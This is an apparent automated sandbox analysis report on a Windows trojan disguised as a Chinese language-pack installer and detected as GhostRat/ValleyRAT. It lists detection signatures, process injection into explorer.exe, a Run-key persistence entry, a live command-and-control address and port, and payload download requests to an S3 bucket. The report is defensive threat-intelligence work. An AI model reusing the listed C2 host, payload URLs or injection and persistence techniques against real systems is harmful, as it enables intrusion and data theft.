Edit tour

Windows Analysis Report
#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Overview

General Information

Sample name:	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe renamed because original name is a hash value
Original sample name:	.exe
Analysis ID:	1637075
MD5:	43cc53fa23d293cfbe704eab6eafb042
SHA1:	27c1ac5e0490a7e1c03677fbeecc05eded2acf4e
SHA256:	8eb94aac55dcfaa3f125994a9bc6d70dfa3ef44c515525e6b7c6e4598442a4fd
Tags:	exeTrojansuser-dght_432
Infos:

Detection

GhostRat, ValleyRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected GhostRat

Yara detected ValleyRAT

Allocates memory in foreign processes

Contains functionality to inject code into remote processes

Drops password protected ZIP file

Found direct / indirect Syscall (likely to bypass EDR)

Injects code into the Windows Explorer (explorer.exe)

Joe Sandbox ML detected suspicious sample

Modifies the context of a thread in another process (thread injection)

Sample is not signed and drops a device driver

Sets debug register (to hijack the execution of another thread)

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

Installs a global mouse hook

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe (PID: 1784 cmdline: "C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe" MD5: 43CC53FA23D293CFBE704EAB6EAFB042)

Microsoft_Xtools.exe (PID: 7592 cmdline: "C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe" MD5: 58B4104495B166543884397497FE2243)

explorer.exe (PID: 496 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 7812 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

kitty.exe (PID: 7888 cmdline: "C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe" MD5: 1112642D4A051570A4CC0363136A16FD)

WerFault.exe (PID: 7996 cmdline: C:\Windows\system32\WerFault.exe -u -p 7888 -s 368 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

rundll32.exe (PID: 7924 cmdline: C:\Windows\System32\rundll32.exe MD5: EF3179D498793BF4234F708D3BE28633)

OpenWith.exe (PID: 3484 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)

Microsoft_Xtools.exe (PID: 8148 cmdline: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe MD5: 58B4104495B166543884397497FE2243)

Microsoft_Xtools.exe (PID: 6912 cmdline: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe MD5: 58B4104495B166543884397497FE2243)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2b67f7:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x318645:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.3133400888.000001A3542C0000.00000020.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2e177:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000009.00000003.1780225829.000002A39D4D2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000D.00000002.3135754043.0000000002190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000009.00000003.1782816540.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000003.1781387142.000002A39D4DB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000003.1773029245.000002A39D4DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000C.00000003.3075008585.000000000C131000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2d303:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000000D.00000002.3132436281.0000000000600000.00000020.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2e177:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000000C.00000002.3148591529.000000000C0F8000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x34dc7:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000000C.00000003.3075284546.000000000C0DC000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x50dc7:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000013.00000003.2309579287.00000187C7E31000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000C.00000003.3075862798.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x47dc7:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000000E.00000002.3133593277.0000000001013000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x6cafe:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000010.00000002.3135862106.000001A3545B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000015.00000003.2894886210.000002A1A5F4D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000C.00000003.3075284546.000000000C0A9000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2e417:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000015.00000003.2899359895.000002A1A5F4B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000C.00000003.3075911766.000000000C0F1000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x3bdc7:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000009.00000003.1770409862.000002A39D2D8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000013.00000003.2305223765.00000187C7E3C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000002.2313605934.00000000034C5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x1e130b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x278ffb:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x2d5085:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x331165:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000009.00000003.1778381910.000002A39D4D5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000013.00000003.2303072630.00000187C7E31000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000C.00000002.3148264683.000000000C0A9000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2e417:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000009.00000003.1784322808.000002A39D4D7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000015.00000003.2892830488.000002A1A5F4B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: Microsoft_Xtools.exe PID: 7592	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: explorer.exe PID: 7812	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: explorer.exe PID: 7812	JoeSecurity_ValleyRAT	Yara detected ValleyRAT	Joe Security
Process Memory Space: rundll32.exe PID: 7924	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: rundll32.exe PID: 7924	JoeSecurity_ValleyRAT	Yara detected ValleyRAT	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe.37ba6c0.5.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x3baa5:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
4.2.#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe.379d450.6.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x58d15:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\System32\rundll32.exe, CommandLine: C:\Windows\System32\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 496, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\System32\rundll32.exe, ProcessId: 7924, ProcessName: rundll32.exe

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 206.238.115.224, DestinationIsIpv6: false, DestinationPort: 4433, EventID: 3, Image: C:\Windows\explorer.exe, Initiated: true, ProcessId: 7812, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49705

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\rundll32.exe, CommandLine: C:\Windows\System32\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 496, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\System32\rundll32.exe, ProcessId: 7924, ProcessName: rundll32.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 496, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bfly

Suricata Signatures

ET MALWARE Winos4.0 Framework CnC Login Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:51:39.992037+0100	2052875	1	Malware Command and Control Activity Detected	192.168.2.6	49705	206.238.115.224	4433	TCP
2025-03-13T10:52:42.988497+0100	2052875	1	Malware Command and Control Activity Detected	192.168.2.6	49705	206.238.115.224	4433	TCP

ET MALWARE Winos4.0 Framework CnC Login Message CnC Server Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:51:56.151055+0100	2059975	1	Malware Command and Control Activity Detected	206.238.115.224	4433	192.168.2.6	49705	TCP
2025-03-13T10:52:58.994834+0100	2059975	1	Malware Command and Control Activity Detected	206.238.115.224	4433	192.168.2.6	49705	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:50:32.795662+0100	2803305	3	Unknown Traffic	192.168.2.6	49693	3.5.237.40	443	TCP
2025-03-13T10:50:42.878721+0100	2803305	3	Unknown Traffic	192.168.2.6	49695	3.5.237.40	443	TCP
2025-03-13T10:50:47.118221+0100	2803305	3	Unknown Traffic	192.168.2.6	49700	3.5.237.40	443	TCP
2025-03-13T10:50:50.731029+0100	2803305	3	Unknown Traffic	192.168.2.6	49701	3.5.237.40	443	TCP
2025-03-13T10:50:54.498036+0100	2803305	3	Unknown Traffic	192.168.2.6	49702	3.5.237.40	443	TCP
2025-03-13T10:50:57.728188+0100	2803305	3	Unknown Traffic	192.168.2.6	49703	3.5.237.40	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Virustotal: Detection: 41%			Perma Link
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	ReversingLabs: Detection: 39%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown

HTTPS traffic detected: 3.5.237.40:443 -> 192.168.2.6:49692 version: TLS 1.2

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002487000.00000004.00000800.00020000.00000000.sdmp, #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.000000000249B000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1741150045.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cdp.pdb source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: Microsoft_Xtools.exe, 00000009.00000003.1780225829.000002A39D4D2000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1782816540.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1781387142.000002A39D4DB000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1773029245.000002A39D4DE000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1770409862.000002A39D2D8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1778381910.000002A39D4D5000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1784322808.000002A39D4D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\BuildAgent\work\52fbca0759d0cd8c\iclsClient\x64\Release\iclsProxy.pdb source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: OneCoreUAPCommonProxyStub.pdbUGP source: Microsoft_Xtools.exe, 00000009.00000003.1775730473.000002A39D4DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\SVN\Xzy_ClientUi_Win_Dev\OUT\build\bin\x64\Master\Launcher_x64_Master_il2cpp.pdb source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000000.1631995825.00007FF69400E000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\dll_UnityPlayer_AutoRun\WhiteDll\x64\Release\WhiteDll.pdb source: kitty.exe, 0000000E.00000002.3135272512.00007FF8DC5E3000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: CoreUIComponents.pdb source: Microsoft_Xtools.exe, 00000013.00000003.2302053190.00000187C7EF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdb source: Microsoft_Xtools.exe, 00000009.00000003.1777690969.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CoreUIComponents.pdbUGP source: Microsoft_Xtools.exe, 00000013.00000003.2302053190.00000187C7EF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: OneCoreUAPCommonProxyStub.pdb source: Microsoft_Xtools.exe, 00000009.00000003.1775730473.000002A39D4DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Jenkins\workspace\new-overwolf-client\Output\Release\Overwolf.pdbBSJB source: kitty.exe, 0000000E.00000000.2070770589.00007FF6F46C2000.00000020.00000001.01000000.00000012.sdmp
Source:	Binary string: E:\Jenkins\workspace\new-overwolf-client\Output\Release\Overwolf.pdb source: kitty.exe, 0000000E.00000000.2070770589.00007FF6F46C2000.00000020.00000001.01000000.00000012.sdmp
Source:	Binary string: Windows.Storage.pdbUGP source: Microsoft_Xtools.exe, 00000009.00000003.1777690969.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002487000.00000004.00000800.00020000.00000000.sdmp, #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.000000000249B000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1741150045.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cdp.pdbUGP source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: Microsoft_Xtools.exe, 00000009.00000003.1780225829.000002A39D4D2000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1782816540.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1781387142.000002A39D4DB000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1773029245.000002A39D4DE000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1770409862.000002A39D2D8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1778381910.000002A39D4D5000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1784322808.000002A39D4D7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\rundll32.exe	File opened: z:
Source: C:\Windows\System32\rundll32.exe	File opened: x:
Source: C:\Windows\System32\rundll32.exe	File opened: v:
Source: C:\Windows\System32\rundll32.exe	File opened: t:
Source: C:\Windows\System32\rundll32.exe	File opened: r:
Source: C:\Windows\System32\rundll32.exe	File opened: p:
Source: C:\Windows\System32\rundll32.exe	File opened: n:
Source: C:\Windows\System32\rundll32.exe	File opened: l:
Source: C:\Windows\System32\rundll32.exe	File opened: j:
Source: C:\Windows\System32\rundll32.exe	File opened: h:
Source: C:\Windows\System32\rundll32.exe	File opened: f:
Source: C:\Windows\System32\rundll32.exe	File opened: b:
Source: C:\Windows\System32\rundll32.exe	File opened: y:
Source: C:\Windows\System32\rundll32.exe	File opened: w:
Source: C:\Windows\System32\rundll32.exe	File opened: u:
Source: C:\Windows\System32\rundll32.exe	File opened: s:
Source: C:\Windows\System32\rundll32.exe	File opened: q:
Source: C:\Windows\System32\rundll32.exe	File opened: o:
Source: C:\Windows\System32\rundll32.exe	File opened: m:
Source: C:\Windows\System32\rundll32.exe	File opened: k:
Source: C:\Windows\System32\rundll32.exe	File opened: i:
Source: C:\Windows\System32\rundll32.exe	File opened: g:
Source: C:\Windows\System32\rundll32.exe	File opened: e:
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: [:

Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Windows\explorer.exe	Code function: 12_2_07B67408 FindFirstFileExW,	12_2_07B67408
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABAB750 FindFirstFileExW,	12_2_0ABAB750
Source: C:\Windows\explorer.exe	Code function: 13_2_0220F710 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,	13_2_0220F710
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5DB16D FindFirstFileExW,	14_2_00007FF8DC5DB16D
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5DB18D FindFirstFileExW,	14_2_00007FF8DC5DB18D
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5DAED8 FindFirstFileExW,	14_2_00007FF8DC5DAED8

Source: C:\Windows\explorer.exe

Code function: 13_2_02206300 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,

13_2_02206300

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2052875 - Severity 1 - ET MALWARE Winos4.0 Framework CnC Login Message : 192.168.2.6:49705 -> 206.238.115.224:4433
Source: Network traffic	Suricata IDS: 2059975 - Severity 1 - ET MALWARE Winos4.0 Framework CnC Login Message CnC Server Response : 206.238.115.224:4433 -> 192.168.2.6:49705

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 206.238.115.224 4433

Source: global traffic

TCP traffic: 192.168.2.6:49705 -> 206.238.115.224:4433

Source: global traffic	HTTP traffic detected: GET /Microsoft_Xtools.exe HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /UnityPlayer.dll HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /static.ini HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
